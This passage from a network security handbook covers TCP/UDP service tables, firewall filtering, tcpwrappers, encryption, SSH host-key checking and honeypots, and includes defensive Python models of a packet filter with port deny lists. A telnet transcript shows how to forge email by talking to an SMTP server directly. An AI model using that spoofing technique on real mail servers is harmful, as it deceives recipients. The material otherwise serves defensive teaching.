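# "Disable" rows of Table 5A (TCP) and Table 5B (UDP), by destination port.
TCP_DISABLED = {7, 13, 19, 21, 23, 37, 79, 512, 513, 514}
UDP_DISABLED = {7, 13, 19, 37, 69, 533}


def _quad(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_packet(pkt: bytes) -> dict:
    """Decode IPv4 plus the transport header; raise ValueError if malformed."""
    if len(pkt) < 20:
        raise ValueError("truncated IPv4 header")
    vihl, _, total, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4
    if vihl >> 4 != 4 or ihl < 20 or total > len(pkt) or ihl > total:
        raise ValueError("bad version, IHL or total length")
    body = pkt[ihl:total]
    info = {"src": _quad(src), "dst": _quad(dst), "proto": proto}
    if proto == 1:                                    # ICMP: type, code, checksum, ...
        if len(body) < 8:
            raise ValueError("truncated ICMP header")
        info["icmp_type"], info["icmp_code"] = struct.unpack("!BB", body[:2])
    elif proto == 6:                                  # TCP
        if len(body) < 20:
            raise ValueError("truncated TCP header")
        sport, dport, seq, ack, off, flags, win = struct.unpack("!HHIIBBH", body[:16])
        if (off >> 4) * 4 < 20:
            raise ValueError("bad TCP data offset")
        info.update(sport=sport, dport=dport, seq=seq, ack=ack, flags=flags, window=win)
    elif proto == 17:                                 # UDP
        if len(body) < 8:
            raise ValueError("truncated UDP header")
        info["sport"], info["dport"], _, _ = struct.unpack("!HHHH", body[:8])
    return info


def tcp_kind(flags: int) -> str:
    """Classify by the SYN/ACK bits, as a packet-filtering firewall does."""
    if flags & SYN and not flags & ACK:
        return "connection request"
    if flags & SYN:
        return "handshake reply"
    return "reset" if flags & RST else "established"


def decide(pkt: bytes, direction: str) -> str:
    """'drop', 'accept+log' or 'accept' for an inbound ('in') or outbound ('out') packet."""
    if direction not in ("in", "out"):
        raise ValueError("direction must be 'in' or 'out'")
    try:
        p = parse_packet(pkt)
    except ValueError:
        return "drop"                                 # malformed traffic is never forwarded
    if p["proto"] == 1:
        blocked = ICMP_BLOCK_IN if direction == "in" else ICMP_BLOCK_OUT
        if p["icmp_type"] in blocked:
            return "drop"
        return "accept+log" if p["icmp_type"] in ICMP_RISKY else "accept"
    if p["proto"] == 6:
        if (direction == "in" and tcp_kind(p["flags"]) == "connection request"
                and p["dport"] in TCP_DISABLED):
            return "drop"
        return "accept"
    if p["proto"] == 17:
        return "drop" if direction == "in" and p["dport"] in UDP_DISABLED else "accept"
    return "drop"                                     # other protocols need an explicit rule


# --- constructed sample packets (documentation-range addresses, not real hosts) ---
def build(src: str, dst: str, proto: int, body: bytes) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(body), 0, 0, 64, proto, 0,
                      bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return hdr + body


def tcp_segment(sport: int, dport: int, seq: int, ack: int, flags: int) -> bytes:
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)


def icmp_message(icmp_type: int, code: int = 0) -> bytes:
    return struct.pack("!BBHHH", icmp_type, code, 0, 0, 0)


def udp_datagram(sport: int, dport: int, payload: bytes = b"") -> bytes:
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


if __name__ == "__main__":
    syn = build("192.0.2.10", "192.0.2.80", 6, tcp_segment(40000, 23, 1000, 0, SYN))
    print(tcp_kind(parse_packet(syn)["flags"]), "->", decide(syn, "in"))
```

The three handshake packets classify as "connection request", "handshake reply" and "established" in turn; only the first carries the SYN-without-ACK signature that the port policy is applied to, which is why a filter can block new telnet connections without disturbing traffic on connections a host opened itself.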
As with TCP, UDP packets are also sent from a port on the sending host to another port on the receiving host. Each UDP packet also contains user data. If a program is listening to the particular port and is ready for the packet, it will be received. If no program is listening, the packet will be ignored, and the receiving host will return an ICMP error message. If a program is listening but is not prepared to receive the packet, it may simply be queued and eventually received, or simply lost.

In contrast to TCP packets, UDP packets can be broadcast, which causes them to be sent to the same port on every host that resides on the same local area network. Broadcast packets are used frequently for services such as time of day. Ports are identified by 16-bit numbers. Table 5B lists some common UDP ports.

Table 5B. Some common UDP services and ports

UDP port | Service name | Function | Security concerns | Recommendation
7 | echo | Returns the user's data in another datagram | a | Disable
9 | discard | Does nothing | |
13 | daytime | Returns time of day | a | Disable
19 | chargen | Character Generator | a | Disable
37 | time | Returns time of day | a | Disable
53 | domain | Domain Name Service (DNS) | c | Restrict access except on public nameservers
67, 68 | bootpc, bootps | Dynamic Host Configuration Protocol (DHCP) | | Restrict access
69 | tftp | Trivial File Transfer Protocol (TFTP) | c | Disable
111 | sunrpc | Sun Microsystems' Remote Procedure Call (RPC) portmapper | c | Restrict access
137-139, 445 | smb | Microsoft networking and file sharing | | Restrict access
123 | ntp | Network Time Protocol (NTP) | | Restrict access
161 | snmp | Simple Network Management Protocol (SNMP) | b, c | Disable or restrict access
513 | who | Collects broadcast messages about who is logged into other machines on the subnet | |
514 | syslog | System-logging facility | a | Restrict access
517 | talk | Initiates a talk request | |
518 | ntalk | The "new" talk request | |
520 | route | Routing Information Protocol (RIP) | c | Disable (use static routing) or restrict access
533 | netwall | Write on every user's terminal | a | Disable
2049 | NFS (usually) | Network Filesystem (NFS) | c | Restrict access

Security concerns:
a) Service can be remotely exploited to create a denial-of-service attack.
b) Protocol requires that a password be transmitted in cleartext across the Internet without the use of any encryption.
c) Service is commonly configured for authentication using IP addresses. This is subject to spoofing and other kinds of attacks.

Clients and Servers

The Internet Protocol is based on the client/server model. Programs called clients initiate connections over the network to other programs called servers, which wait for the connections to be made. One example of a client/server pair is the Network Time System. The client program is the program that asks the network server for the time. The server program is the program that listens for these requests and transmits the correct time. In Unix parlance, server programs that run in the background and wait for user requests are often known as daemons. In the Microsoft world, they are called services.

You can connect to an arbitrary TCP/IP port of a computer using the telnet program. (The telnet program was originally used for logging into remote systems. However, as this requires sending an unencrypted password over the network, such use of the telnet program is now strongly discouraged.) For instance, you might connect to port 25 (the SMTP port) to fake some mail without going through the normal mailer:

    % telnet control.mil 25
    Trying 45.1.12.2 ...
    Connected to hq.control.mil.
    Escape character is '^]'.
    220 hq.control.mil ESMTP Sendmail 8.11.6/8.11.6; Sun, 18 Aug 2002 21:21:03 -0500
    HELO kaos.org
    250 hq.control.mil Hello kaos.org, pleased to meet you
    MAIL FROM:
    250 ... Sender ok
    RCPT TO:
    550 ... Recipient ok
    DATA
    354 Enter mail, end with "." on a line by itself
    To: agent99
    From: Max
    Subject: tonight

    99, I know I was supposed to take you out to dinner tonight, but I have
    been captured by KAOS agents, and they won't let me out until they finish
    torturing me. I hope you understand.

    Love,
    Max
    .
    250 UAA01441 Message accepted for delivery
    QUIT
    221 hq.control.mil closing connection
    Connection closed by foreign host.
    %

Hostnames and DNS

A hostname is the name of a computer on the Internet. Hostnames make life simpler for users: they are easier to remember than IP addresses. You can change a computer's IP address but keep its hostname the same. A single hostname can have more than one IP address, and a single IP address can be associated with more than one hostname. Both of these facts have profound implications for people who are attempting to write secure network programs.

Hostnames must begin with a letter or number and may contain letters, numbers, and a few symbols, such as the hyphen (-).[240] Case is ignored. A sample hostname is tock.cerias.purdue.edu. For more information on hostnames, see RFC 1122 and RFC 1123.

Each hostname has two parts: the computer's machine name and its domain. The computer's machine name is the name to the left of the first period; the domain name is everything to the right of the first period. In our example above, the machine name is tock, and the domain is cerias.purdue.edu. The domain name may represent further hierarchical domains if there is a period in the name. For instance, cerias.purdue.edu represents the CERIAS center domain, which is part of the Purdue University domain, which is, in turn, part of the Educational Institutions top-level domain.

In the early days of the Internet, a single file (/etc/hosts) contained the address and name of each computer on the Internet.
But as the file grew to contain thousands of lines, and as changes to the list of names started being made on a daily basis, a file soon became impossible to maintain. Instead, the Internet developed a distributed network-based naming service called the Domain Name Service (DNS).

DNS implements a large-scale distributed database for translating hostnames into IP addresses and vice versa, and performing related name functions. The software performs this function by using the network to resolve each part of the hostname distinctly. For example, if a computer is trying to resolve the name girigiri.gbrmpa.gov.au, it would first get the address of a root domain server (usually stored in a file) and ask that machine for the address of an au top-level domain server. The computer would then ask the au domain server for the address of a gov.au domain server, and then would ask that machine for the address of a gbrmpa.gov.au domain server. Finally, the computer would then ask the gbrmpa.gov.au domain server for the address of the computer called girigiri.gbrmpa.gov.au. A variety of caching techniques are employed to minimize overall network traffic. DNS hostname lookups are typically performed over UDP, but DNS also uses TCP for some operations.

IP Security

The Internet and the IP protocols are vulnerable to many different kinds of attacks, including password guessing, social engineering, bugs in software, network sniffing, packet spoofing and data tampering, connection hijacking, and denial of service attacks. Many of these attacks were anticipated years before they arose in the wild. Yet the IP protocols and the Internet itself are not well-protected against them. IP was not designed to provide security and is not resilient to purposeful attack.

Several techniques can add security to IP networks. These include application access controls, using encryption, advanced authentication systems, SSH, and decoy systems (honeypots). Each is discussed in detail below.
In addition, the use of firewalls (discussed earlier), hardening server hosts (discussed in chapter 5-5), and physical isolation of vulnerable systems can be employed to enhance security.

[240] Technically, hostnames should not contain the underscore (_) character, but most systems that map hostnames to IP addresses grudgingly accept the underscore, and Microsoft's Active Directory service effectively requires it, in violation of at least one RFC.

Application Access Controls

Many network applications can be configured with access control lists that determine which hosts are permitted to connect to the application (or, in a less secure but common configuration, which hosts are prohibited from connecting). On Unix systems, a standard access control mechanism for applications has developed around Wietse Venema's tcpwrappers system, which consists of a library for access control checking (libwrap), a wrapper program for adding access checks to network servers that don't use the library (tcpd), and a pair of access control configuration files (/etc/hosts.allow and /etc/hosts.deny). On modern systems, /etc/hosts.deny should contain a catchall deny rule ("ALL:ALL"), while /etc/hosts.allow should contain rules that permit access to specific services by specific hosts. In addition to permitting or denying connections, the tcpwrappers system can perform double reverse name lookups, do extra logging, perform ident lookups on connections (see below), send banners to connecting clients, and even run auxiliary commands or substitute a fake environment to study the behavior of the connecting client. Accordingly, tcpwrappers can make up for deficiencies in other network server programs. For details on configuring tcpwrappers, see PUIS, 315-323. On other operating systems, each application typically manages its own access control lists (or relies on the system's host-based packet filter).
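The hosts.allow/hosts.deny decision described above, as an added example that models tcpwrappers rather than reusing its code. It follows the documented order of evaluation (a match in hosts.allow grants, otherwise a match in hosts.deny refuses, otherwise the connection is allowed) and recognises a subset of the pattern syntax: ALL, a leading-dot domain suffix, a trailing-dot address prefix, net/mask, and EXCEPT. The two file contents are constructed for illustration, and the daemon and host names in them are placeholders.

```python
"""A model of tcpwrappers access decisions (added example, not tcpwrappers code)."""
import re
from typing import Callable, List, Tuple

HOSTS_ALLOW = """\
# Constructed /etc/hosts.allow: "service list : client list"
sshd : 192.168.1. 10.0.0.0/255.255.0.0
in.ftpd : .example.org EXCEPT untrusted.example.org
"""
HOSTS_DENY = """\
# Constructed /etc/hosts.deny: the catch-all the text recommends
ALL : ALL
"""

_IP_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def _is_ip(s: str) -> bool:
    return bool(_IP_RE.fullmatch(s)) and all(int(o) <= 255 for o in s.split("."))


def _ip_int(addr: str) -> int:
    value = 0
    for octet in addr.split("."):
        value = (value << 8) | int(octet)
    return value


def host_matches(pattern: str, hostname: str, address: str) -> bool:
    """One client pattern against the connecting host's name and address."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if pattern == "all":
        return True
    if pattern.startswith("."):            # ".example.org": domain suffix
        return hostname.endswith(pattern)
    if pattern.endswith("."):              # "192.168.1.": address prefix
        return address.startswith(pattern)
    if "/" in pattern:                     # "10.0.0.0/255.255.0.0": net/mask
        net, mask = pattern.split("/", 1)
        if not (_is_ip(net) and _is_ip(mask)):
            raise ValueError(f"bad net/mask pattern {pattern!r}")
        m = _ip_int(mask)
        return _ip_int(address) & m == _ip_int(net) & m
    return pattern in (hostname, address)  # exact name or address


def list_matches(spec: str, item_match: Callable[[str], bool]) -> bool:
    """'a b EXCEPT c d' matches when a or b matches and neither c nor d does."""
    parts = re.split(r"\s+EXCEPT\s+", spec.strip(), maxsplit=1, flags=re.IGNORECASE)
    hit = any(item_match(tok) for tok in parts[0].split())
    if len(parts) == 2:
        return hit and not list_matches(parts[1], item_match)
    return hit


def parse_rules(text: str) -> List[Tuple[str, str]]:
    """(service list, client list) per rule; blank lines and '#' lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split(":")]
        if len(fields) < 2:
            raise ValueError(f"malformed rule: {line!r}")
        rules.append((fields[0], fields[1]))  # an optional third (shell command) field is ignored
    return rules


def rule_matches(rule: Tuple[str, str], daemon: str, hostname: str, address: str) -> bool:
    services, clients = rule
    return (list_matches(services, lambda p: p.lower() in ("all", daemon.lower()))
            and list_matches(clients, lambda p: host_matches(p, hostname, address)))


def access_decision(daemon: str, hostname: str, address: str,
                    allow_text: str = HOSTS_ALLOW, deny_text: str = HOSTS_DENY) -> str:
    """hosts.allow match grants; else hosts.deny match refuses; else access is granted."""
    for rule in parse_rules(allow_text):
        if rule_matches(rule, daemon, hostname, address):
            return "allow"
    for rule in parse_rules(deny_text):
        if rule_matches(rule, daemon, hostname, address):
            return "deny"
    return "allow"


if __name__ == "__main__":
    for args in (("sshd", "pc7.corp.example", "192.168.1.20"),
                 ("sshd", "pc8.corp.example", "172.16.0.9"),
                 ("in.ftpd", "untrusted.example.org", "203.0.113.6")):
        print(*args, "->", access_decision(*args))
```

The last branch of access_decision is the reason the text insists on a catch-all ALL:ALL in hosts.deny: with both files empty, or with a deny file that does not cover a service, tcpwrappers lets the connection through.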
Using Encryption to Protect IP Networks from Eavesdropping

IP is designed to get packets from one computer to another computer; the protocol makes no promise as to whether other computers on the same network will be able to intercept and read those packets in real time. Such interception is called eavesdropping or packet sniffing.

On Ethernet and unswitched twisted-pair networks, the potential for eavesdropping is high because packets can be intercepted by any host on the network. Using an Ethernet switch can dramatically reduce the potential for eavesdropping. A switch is a special-purpose device that transmits packets only to the computers for which they are destined. However, it is still possible to monitor a switched network by programming the switch to create a mirror or monitor port, or to attack a switch to attempt to confuse its internal table associating computers and addresses. Although token ring networks are not inherently broadcast, in practice all packets that are transmitted on the ring pass through, on average, one-half of the interfaces that are on the network, so equivalent concerns apply. As discussed earlier in this chapter, telephone lines and wireless networks can also be sniffed; in a similar fashion, IP transmissions over cable TV or power lines can be intercepted.

In short, with most network technologies it is impossible to prevent or even detect eavesdropping. The only thing you can do is assume that your network traffic is in fact being eavesdropped and use encryption so that the recorded network traffic will not be useful to an attacker.[241] There are several places where encryption can be used to improve the security of IP networking protocols:

Link-level encryption
With link-level encryption, packets are automatically encrypted when they are transmitted over an unsecure data link and decrypted when they are received. Eavesdropping is defeated because an eavesdropper does not know how to decrypt packets that are intercepted.
Link-level encryption is available on many radio-networking products, but is harder to find for other broadcast network technologies such as Ethernet or FDDI. Special link encryptors are available for modems and leased-line links.

[241] Even with encryption, however, the source and destination addresses and ports of packets can be determined by an attacker and used for traffic analysis.

End-to-end encryption
With end-to-end encryption, the host transmitting the packet encrypts the packet's data; the packet's contents are automatically decrypted when they are received at the other end. Some organizations that have more than one physical location use encrypting routers for connecting to the Internet. These routers automatically encrypt packets that are sent from one corporate location to the other to prevent eavesdropping by attackers on the Internet (these are known as VPNs); however, the routers do not encrypt packets that are sent from the organization to third-party sites on the network. Today, this kind of packet-level encryption is typically implemented using the IPsec protocol (described in RFC 2401). IPsec can be used to transparently encrypt all communications between two hosts, between a host and a network, or between two networks. Using IPsec is a powerful way to automatically add encryption to systems that otherwise do not provide it.

Application-level encryption
Instead of relying on hardware to encrypt data, encryption can be done at the application level. For example, the Kerberos version of the telnet command can automatically encrypt the contents of the telnet data stream in both directions. The Secure Shell protocol (ssh) automatically provides for encryption of the data stream. Application-level encryption can also be provided by tunneling or wrapping an existing application-level protocol using a second protocol.
For example, the Secure Shell protocol provides for TCP/IP ports and connections to be "forwarded" from one host to another over a cryptographically-protected tunnel. Individual application servers and clients can also be wrapped using the SSL and TLS protocols.

Simply using encryption is not enough: the encryption must be properly implemented for it to provide protection. As discussed above, WEP, the original encryption standard for 802.11b wireless LANs, does not provide any true confidentiality at all: the encryption implementation is flawed, and it is trivial to determine the encryption keys used by WEP systems.

Advanced Authentication Systems

Most IP services do not provide a strong system for positive authentication. As a result, an attacker can transmit information and claim that it comes from another source. The lack of positive authentication presents problems, especially for services such as DNS, electronic mail, and Netnews (Usenet). In all of these services, the recipient of a message, be it a machine or a person, is likely to take positive action based on the content of a message, whether or not the message sender is properly authenticated.

Authentication systems have been developed for each of these services. DNS supports the cryptographic signing of zone data and authentication between nameservers using a shared secret key, mail servers can authenticate valid senders against a database using the SMTP AUTH extension, and Usenet messages can be cryptographically signed with PGP. However, adoption of these systems has not been widespread to date. IPsec, discussed above, also provides for strong authentication between peers. IP traffic received over such a VPN is more likely to be from the source that it claims to be, but for most Internet services, VPNs will not be used.

ident

Many of the authentication problems arise because the TCP/IP protocol is a system for creating communication channels between computers, and not between users.
When a server receives a TCP/IP connection from a client, it knows the IP address of the client. However, the server has no way to readily ascertain the name of the person who initiated the TCP/IP connection. When the TCP/IP protocol suite was developed, there was no need for a general-purpose approach for learning the names of people initiating TCP/IP connections. Protocols that required usernames (e.g., SMTP and FTP) provided them.

As the Internet has grown, network managers have discovered a very important reason for knowing the name of a person initiating a TCP/IP connection: accountability. If a remote system administrator discovers that her computer was attacked at 5:00 p.m. by a user at a computer named fas.harvard.edu, it is important to be able to trace that attack back to the specific user and account that was responsible for the attack so that either the user can be punished or the compromised account can be terminated.

The identification protocol gives you a way of addressing this problem with a simple callback scheme. When a server wants to know the "real name" of a person initiating a TCP/IP connection, it simply opens a connection to the client machine's ident daemon (identd) and sends a description of the TCP/IP connection in progress; the remote machine sends a human-readable representation of the user who is initiating the connection. Traditionally, the information sent back to the requesting system was the user's username. More recent implementations of the ident daemon provide for an encrypted token to be sent back; the token can later be decrypted by the remote site with the cooperation of the site running the ident daemon. This prevents identd lookups from being used to get username information on a remote host without its cooperation.

The identification protocol depends on the honesty of the computer that is originating the TCP/IP connection.
If your system is under attack from a multiuser system that has not been otherwise compromised, identd may be valuable. On the other hand, if your system is under attack from a single-user computer that is not running identd or is running an identd that has been gimmicked to give untrue or misleading information, the response may be worthless. Because major IRC networks require clients to run an ident daemon, there are many free Windows-based ident daemons that return false responses.

In general, the responses of identd queries are more useful to the administrators of the site that sends the response than they are to the site that receives it. Thus, logging ident queries may not help you, but can be a courtesy to others--it lets the remote site know which account was involved in the attack. That's especially useful if the attacker went on to erase log files or otherwise damage the originating site. Not surprisingly, identd has been most useful in tracking down attackers originating at universities and other organizations with large multiuser Unix systems. Sites that have nonprivileged interactive Unix users should run ident to help track down accounts that have been compromised during an incident.

SSH (Secure Shell)

Originally developed by Tatu Ylonen, SSH (the Secure Shell) is a cryptographically-enabled protocol for remote login, file copying, and TCP connection tunneling (also known as port forwarding by SSH users). Although originally implemented solely by Tatu Ylonen's ssh command-line Unix utility, today the SSH protocol is implemented by dozens of programs on many platforms. The two most popular implementations are Ylonen's original SSH, and OpenSSH, developed by the OpenBSD Project. Commercial clients and servers are also available.

SSH has become a crucial piece of network security infrastructure because it can replace several protocols and programs that transmit plaintext passwords (including telnet, rlogin, rsh, rcp, rdist, and ftp).
In addition, the TCP connection tunneling facility makes it possible to use SSH as the basis for a virtual private network. SSH has particular support for tunneling the X-Windows protocol.

There are two versions of the SSH protocol. Although both protocols allow the symmetric cipher to be negotiated, SSH Version 1 relies on the RSA public key encryption algorithm for authentication and initial key exchange. SSH Version 2 has extended the protocol by allowing both the RSA and the DSA public key algorithms and has corrected several flaws in the SSH1 protocol. Version 2 is therefore recommended.

Host authentication with SSH

Every host that runs an SSH server is supposed to have its own unique RSA public and private key pair, called the SSH HostKey. Version 2 servers have a second key pair, called the HostDSAKey, that uses the DSA algorithm. Most SSH startup scripts will automatically create this key the first time that the server is run if the key does not already exist. When an SSH client connects to the server, the server provides its public key. This key serves two purposes. First, the client uses this key to encrypt information that is sent back to the server during the authentication phase. Second, the public key is used by the server to establish its identity. Each time a client connects to the server, the server provides the same public key to the client; the client is thus able to determine, each time it connects, that it is communicating with the same server as on previous occasions. The host key protects against two kinds of attacks. First, it assures that you are connecting to the correct host.
If the host you intend to connect to has changed its IP address or has a new DNS name (or if somebody has attacked your DNS system and it is handing out the wrong IP addresses), the SSH client will note that the new host has a different HostKey from the older address, and you will, presumably, not provide your password. Second, the HostKey assures that you will have an encrypted connection directly to the remote server, and that no intermediate machine is engaging in a man-in-the-middle attack. For a successful man-in-the-middle attack to take place, an attacker would need to provide his own public key, one to which he presumably holds the matching private key. (An attacker mounting a man-in-the-middle attack would not provide the HostKey of the server under attack because, if he did, he would be unable to decrypt the resulting communications.)

Unfortunately, HostKeys seem to change on a fairly regular basis, sometimes whenever a new operating system is installed, or when a new SSH installation inadvertently creates a new host key rather than preserving the old one. Therefore, if the HostKey of a server that you communicate with changes, you shouldn't assume that the server has been compromised or that a man-in-the-middle attack is taking place. But you might want to look into why the key was changed.

Client authentication with SSH

When a client connects to the SSH server, the client provides the username of the account that it wishes to use. It then provides a suitable authentication credential to prove that it is entitled to the account. If the server is satisfied by the client's credentials, it starts up a copy of the user's shell and logs the user in. SSH offers a variety of secure methods for authenticating clients to the server's operating system:[241]

· Clients can provide a valid password for the account on the remote server. This password is not transmitted in plain text.
· Clients can prove their identities using public key cryptography, if the client presents a public key that is in the user's authorized keys file and the client can decrypt information that is encrypted with that public key.
· Clients can authenticate using Kerberos, one-time passwords, or other challenge/response systems available on the server.

[241] SSH also offers some less secure methods that are based on the client's IP address; these should generally be avoided.

TCP connection tunneling

SSH can tunnel a TCP connection between a second client and server. First, the ssh client is used to make a connection to the ssh server on the remote machine and to request a tunnel to a given other port on the remote machine. If the ssh client successfully authenticates and connects, it listens on a new port on the local machine; the ssh server initiates a connection to the second server on the remote machine. The second client is directed to connect to the new port on the local host, and data received on this new port is transmitted by ssh to the remote sshd server, which passes it on to the second remote server. Some protocols cannot be protected with a simple TCP tunnel. FTP, for example, requires multiple tunnels (some of which are difficult to predict), and so most SSH distributions provide a substitute ftp client (often called sftp) that works as users expect an FTP program to, but uses an SSH connection. The X-Windows protocol presents some similar difficulties, but specific support for tunneling X-Windows connections is available in most SSH applications. Instead of running a remote X client directly against a local X server, SSH creates a tunnel and a virtual X display that the remote client can safely use to communicate with the local server via SSH.

Decoy Systems

A final approach to subverting attackers is to set up decoy systems for the attackers to attack.
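The host key comparison described under "Host authentication with SSH" above, as an added example that is neither the handbook's nor OpenSSH's code: a client-side check against a known_hosts-style store that tells a first contact, an unchanged key, and a changed key apart (a changed key being, as the text says, a reason to investigate rather than proof of an attack). The entries follow the known_hosts line layout, including the hashed host-name form; the key blobs and salt are constructed placeholders, not real SSH keys.

```python
"""SSH host key check against a known_hosts store (added example, not the
handbook's or OpenSSH's code). Reproduces the client-side comparison the text
describes: the key a server presents is matched against the key remembered
for that host, so a first contact, an unchanged key and a changed key are
told apart. Key blobs and the salt below are constructed placeholders."""
import base64
import hashlib
import hmac
from typing import List, NamedTuple


class KnownHost(NamedTuple):
    hostpattern: str   # "name1,name2" or hashed "|1|<b64 salt>|<b64 hmac>"
    keytype: str       # e.g. ssh-rsa, ssh-ed25519
    key: bytes         # decoded public key blob


def _b64(b: bytes) -> str:
    return base64.b64encode(b).decode("ascii")


def plain_entry(hosts: str, keytype: str, key: bytes) -> str:
    return f"{hosts} {keytype} {_b64(key)}"


def hashed_entry(host: str, keytype: str, key: bytes, salt: bytes) -> str:
    """HashKnownHosts form: the name is replaced by HMAC-SHA1(salt, name), so a
    stolen known_hosts file does not list the hosts the user connects to."""
    mac = hmac.new(salt, host.encode("utf-8"), hashlib.sha1).digest()
    return f"|1|{_b64(salt)}|{_b64(mac)} {keytype} {_b64(key)}"


def parse_known_hosts(text: str) -> List[KnownHost]:
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 3:
            continue          # malformed; a real client warns and moves on
        try:
            key = base64.b64decode(fields[2], validate=True)
        except ValueError:
            continue
        entries.append(KnownHost(fields[0], fields[1], key))
    return entries


def host_matches(pattern: str, host: str) -> bool:
    if pattern.startswith("|1|"):
        _, _, salt_b64, mac_b64 = pattern.split("|", 3)
        salt = base64.b64decode(salt_b64)
        mac = hmac.new(salt, host.encode("utf-8"), hashlib.sha1).digest()
        return hmac.compare_digest(mac, base64.b64decode(mac_b64))
    return host in pattern.split(",")


def check_host_key(entries: List[KnownHost], host: str, keytype: str,
                   presented: bytes) -> str:
    """'unknown': first contact, nothing to compare against (trust on first use).
    'match':   same key as before, so the same server and no intermediary.
    'changed': a different key: a reinstall, a regenerated key, or somebody
               presenting his own key. Withhold the password until you know which."""
    same_type = [e for e in entries
                 if e.keytype == keytype and host_matches(e.hostpattern, host)]
    if not same_type:
        return "unknown"
    return "match" if any(e.key == presented for e in same_type) else "changed"


def fingerprint(key: bytes) -> str:
    """OpenSSH-style SHA256 fingerprint, shown to the user on first contact."""
    return "SHA256:" + _b64(hashlib.sha256(key).digest()).rstrip("=")


# Constructed placeholders (not real keys) and a sample known_hosts file.
KEY_A = b"constructed-host-key-blob-A"
KEY_B = b"constructed-host-key-blob-B"
SALT = b"constructed-20-byte-"
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# gateway, listed by name and address",
    plain_entry("gateway.example.net,192.0.2.5", "ssh-rsa", KEY_A),
    hashed_entry("build.example.net", "ssh-ed25519", KEY_B, SALT),
])

if __name__ == "__main__":
    entries = parse_known_hosts(SAMPLE_KNOWN_HOSTS)
    for host, ktype, key in (("gateway.example.net", "ssh-rsa", KEY_A),
                             ("gateway.example.net", "ssh-rsa", KEY_B),
                             ("build.example.net", "ssh-ed25519", KEY_B),
                             ("new.example.net", "ssh-rsa", KEY_A)):
        print(host, check_host_key(entries, host, ktype, key), fingerprint(key))
```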
Decoy systems are closely monitored; often these systems are built with known vulnerabilities to increase their likelihood of attack. Decoy systems, sometimes called honeypots or honeynets, have two primary advantages:

1. Because they are closely monitored, decoy systems can be used to learn about attackers. Decoy systems can reveal attacker locations, techniques, motivations, skill levels, objectives, and many other pieces of information.
2. If a decoy system is sufficiently rich and compelling, exploring that system might consume so much of the attacker's time that the attacker will not have the time to attack systems that you actually care about. For example, Brad Spencer has championed the use of honeypot open relays to monitor and distract e-mail spammers (for some details, see http://fightrelayspam.homestead.com/files/antispam06132002.htm).

Decoy systems are not without their risks. The first risk is that the attacker will find something of value in the system. You must make absolutely certain that there is nothing on the decoy system that an attacker could use to harm you. Specifically, the decoy system should contain no information about your organization. One way to accomplish this goal is to use only new computers for your decoy system, rather than computers repurposed from other projects. Furthermore, if your organization has a firewall, the decoy system should be outside the firewall. A second risk of decoy systems is that they can become platforms for attacking other computers on the Internet, possibly making you liable for third-party civil damages or even for charges of criminal conspiracy! For both of these reasons, you should think carefully (and possibly consult with an attorney) before setting up a decoy or honeypot system.

CHAPTER 8. ATTACKS AND DEFENSES

At a Glance

Many techniques have been developed to attack workstations and servers.
These techniques can be broadly divided into three categories:

Denial of service attacks and remote exploits
Vulnerabilities exist in many computers that make it possible for an attacker to disable the system without otherwise compromising it. In many cases, denials of service can be performed over the network without actually logging into the system. In other cases, attackers use network access to compromise and penetrate vulnerable systems.

Programmed threats
Another way for an attacker to compromise a system is to provide the system's users with a hostile program and wait for them to run the program. Some programs install hidden services that give attackers remote access; others replicate themselves and travel between computers.

Social engineering
In a social engineering attack, the attacker takes advantage of the natural helpfulness of your users or administrators to cause them to reveal secrets or take inappropriate actions.

Each of these classes of attacks is covered in greater detail in this chapter, along with recommended defense practices.

Denial of Service Attacks

A denial of service attack is an attack in which one user takes up so much of a shared resource that none of the resource is left for other users. Denial of service attacks compromise the availability of resources. Those resources can be processes, disk space, processor time, printer paper, modems, or the time of a harried system administrator. The result is degradation or loss of service. Broadly speaking, there are two types of denial of service attacks:

Destructive attacks
Such attacks damage or destroy resources so you can't use them. Examples range from causing a disk crash that halts your system to deleting critical system files.

Overload attacks
Such attacks overload some system service or exhaust some resource (either deliberately by an attacker, or accidentally as the result of a user's mistake), thus preventing others from using that service.
The simplest type of overload involves filling up a disk partition so that users and system programs can't create new files. A network-based overload attack could bombard a network server with so many requests that it is unable to service them, or it could flood an organization's Internet connection so that no bandwidth remains to send desired information. Many modern operating systems provide mechanisms for protecting against denial of service. You may be able to limit the maximum number of files or processes that a user is allowed, the amount of disk space that each user is allotted, and even the amount of CPU time that each user process may consume. Network services can be limited in terms of CPU time and rate. Nevertheless, many systems in the field remain vulnerable to denial of service attacks because the protective measures are typically not enabled or not properly set.

Destructive Attacks

There are a number of ways to destroy or damage information in a fashion that denies service. Almost all of the known attacks can be prevented by restricting access to critical accounts and files, and protecting them from unauthorized users. If you follow good security practices to protect the integrity of your system, you will also prevent destructive denial of service attacks.

Overload Attacks

In an overload attack, a shared resource or service is overloaded with requests to such a point that it is unable to satisfy requests from other users. For example, if one user spawns enough processes, other users won't be able to run processes of their own. If one user fills up the disks, other users won't be able to create new files. You can partially protect against overload attacks through the use of quotas and other techniques that limit the amount of resources that a single user can consume.
You can use physical limitations as a kind of quota; for example, you can partition your computer's resources and then limit each user to a single partition. Finally, you can set up systems for automatically detecting overloads and restarting your computer, although giving an attacker the capability to restart your computer at will can create other problems.

Process, CPU, and Memory Overload Problems

